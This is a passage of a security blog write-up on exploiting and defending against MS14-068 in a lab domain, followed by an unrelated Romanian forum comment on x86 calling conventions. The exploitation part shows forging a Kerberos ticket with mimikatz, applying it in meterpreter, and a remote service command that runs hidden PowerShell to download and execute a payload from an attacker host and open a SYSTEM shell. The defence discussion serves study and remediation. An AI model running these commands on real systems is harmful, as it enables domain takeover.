forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 09f49cffb2e13a13699fd40443a9fb88 Ticket : 0x00000000 - null ; kvno = 2 [...] * Saved to file 0-50a00000-user01@krbtgt-METASPLOITABLE.LOCAL.kirbi ! mimikatz(commandline) # exit Bye! fixme:lsa:LsaDeregisterLogonProcess (nil) stub Now we can load the Kiwi Mimikatz extension into meterpreter, install our ticket, and access resources as a Domain Administrator: meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.0 alpha (x86/win32) release "Kiwi en C" .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */ [!] Loaded x86 Kiwi on an x64 architecture. success. meterpreter > kerberos_ticket_use /root/git/pykek/0-50a00000-user01@krbtgt-METASPLOITABLE.LOCAL.kirbi [*] Using Kerberos ticket stored in /root/git/pykek/0-50a00000-user01@krbtgt-METASPLOITABLE.LOCAL.kirbi, 1231 bytes [+] Kerberos ticket applied successfully We can then use create a service remotely, like PSEXEC to get a reverse shell: meterpreter > shell Process 1132 created. Channel 2 created. Microsoft Windows [Version 6.3.9600] © 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32\WindowsPowerShell\v1.0>sc \\msfdc01\ create psh binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.3.76:8080/moKqrqIYh0'))" sc \\msfdc01\ create psh binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient). downloadstring('http://172.16.3.76:8080/moKqrqIYh0'))" [sC] CreateService SUCCESS C:\Windows\system32\WindowsPowerShell\v1.0>sc \\msfdc01\ start psh sc \\msfdc01\ start psh [sC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. C:\Windows\system32\WindowsPowerShell\v1.0>sc \\msfdc01\ delete psh sc \\msfdc01\ delete psh [sC] DeleteService SUCCESS C:\Windows\system32\WindowsPowerShell\v1.0>exit exit meterpreter > background [*] Backgrounding session 5... [*] [2014.12.10-13:10:28] 172.16.80.10 web_delivery - Delivering Payload [*] [2014.12.10-13:10:28] Sending stage (770048 bytes) to 172.16.80.10 [*] Meterpreter session 6 opened (172.16.3.76:8686 -> 172.16.80.10:63162) at 2014-12-10 13:10:31 +0000 20141210-13:10 - 192.168.153.135 exploit(current_user_psexec) > sessions -i 6 [*] Starting interaction with 6... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : MSFDC01 OS : Windows 2008 (Build 6002, Service Pack 2). Architecture : x86 System Language : en_GB Meterpreter : x86/win32 Pivoting native tools via Meterpreter to exploit this issue can prove difficult. Forwarding TCP port 445 allows you to use smbclient, however tools such as Winexe require ephemeral DCE-RPC ports so unless you are creating a VPN to your target this would be painful to use remotely. Hopefully more support for this soon. Also, it’s worth keeping your eye on the current_user_psexec module as it may simplify the post exploitation steps in future. We have made a pull request that introduces Kerberos support, by targeting hostnames instead of IP addresses, to this module: 20141210-22:17 - 192.168.153.133 exploit(current_user_psexec) > rerun [*] Reloading module... [*] [2014.12.10-22:17:22] Started reverse handler on 172.16.80.225:8888 [*] [2014.12.10-22:17:22] msfdc01 Creating service kWfrGWFDDd [*] [2014.12.10-22:17:23] msfdc01 Starting the service [*] [2014.12.10-22:17:24] msfdc01 Deleting the service [*] [2014.12.10-22:17:26] Sending stage (770048 bytes) to 172.16.80.10 [*] Meterpreter session 5 opened (172.16.80.225:8888 -> 172.16.80.10:63815) at 2014-12-10 22:17:43 +0000 Gotchas There are a few common issues that may prevent the MS14-068 exploits from working correctly. For example, if the DNS server isn’t resolving correctly you can have trouble authenticating with the Kerberos token. Here are a couple of tricks if you have problems exploiting the issue: Check your local system time is in sync with target Try with full domain name in CAPITALS, e.g. MSFDC01.METASPLOITABLE.LOCAL Try without the FQDN (i.e. just the Netbios name), e.g. msfdc01 or MSFDC01 Add the addresses to your /etc/hosts file Use Wireshark to check the DNS requests, you may see incorrect requests like MSFDC01.METASPLOITABLE.LOCAL.METASPLOITABLE.LOCAL How can I defend against this? The only solution for preventing this attack is to apply the patch. If this hasn’t been done already then it may be too late. Microsoft have indicated just how serious this issue is in their blog post giving additional information on the issue: Remediation The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain. An attacker with administrative privilege on a domain controller can make a nearly unbounded number of changes to the system that can allow the attacker to persist their access long after the update has been installed. Therefore it is critical to install the update immediately. This guidance just highlights how important it is to apply security patches in a timely manner. In the same post, Microsoft provided advice on detecting exploitation of MS14-068. They indicated that login events with a mismatch between the SID and the account name had been observed in the wild. However, the public exploits that have been recently released do not have this same indicator when used correctly. Therefore, only those with well developed monitoring infrastructure are likely to identify any access anomalies that indicate compromise and attempts to exfiltrate data. This vulnerability demonstrates that if an organisation’s security relies heavily on a single control, such as whether the user is in a particular domain group, they are at risk from attackers defeating that control and gaining easy access to sensitive information. Security must come from understanding which assets are important, where they are located, and restricting routes to those assets so that, for example, a single compromised desktop cannot access them. The number of access routes to critical data should be minimized and hardened to prevent initial exploitation and local privilege escalation. They should also be heavily monitored for signs of compromise, such as accounts trying to access resources they shouldn’t or accounts being added to privileged groups, or early indicators of an attacker trying to gain a foothold, such as EMET or software restriction exceptions. Conclusion A key goal of attackers seeking to compromise a company’s assets is to escalate their privileges to make discovery and access to the information they seek easier. Therefore, a vulnerability such as MS14-068 is highly valuable to them as it allows total access to the domain from a simple phishing attack on a single desktop user. The fact that exploitation of this issue was found in the wild also shows that attackers are not just researching 0-days in browsers and file viewing software, but are also actively researching later stages of compromise such as lateral and vertical movement. MS14-068 is an exciting prospect for penetration testers as it may provide us with an easy privilege escalation route in engagements over the next few years. However, the worrying flip-side to this is that sensitive corporate and national networks are likely to be vulnerable to such an easy attack. Even worse, it will be difficult to be certain of the integrity of networks that have been patched. References Additional information about CVE-2014-6324 Microsoft Security Bulletin MS14-068 – Critical Microsoft Security Bulletin MS11-013 – Important MIT krb5 Security Advisory 2010-007 A Quick Look at MS14-068 mimikatz presentation by Benjamin Delpy – Passwords#14 MS-PAC: Privilege Attribute Certificate Data Structure Sursa: https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/

Nu e nevoie sa pui totul in EAX inainte de push. Iar eliberarea memoriei NU se face pentru WinAPI (ex, MessageBox) deoarece au calling convention __stdcall. Functiile din C au calling convention __cdecl si acolo e necesara acea secventa "pop ebx..." dar nu se face asa, se face mai rapid cu incrementarea ESP-ului: add ESP, 0x10 (adica 16 bytes). Info: 1. Calling Conventions Demystified - CodeProject 2. Using Win32 calling conventions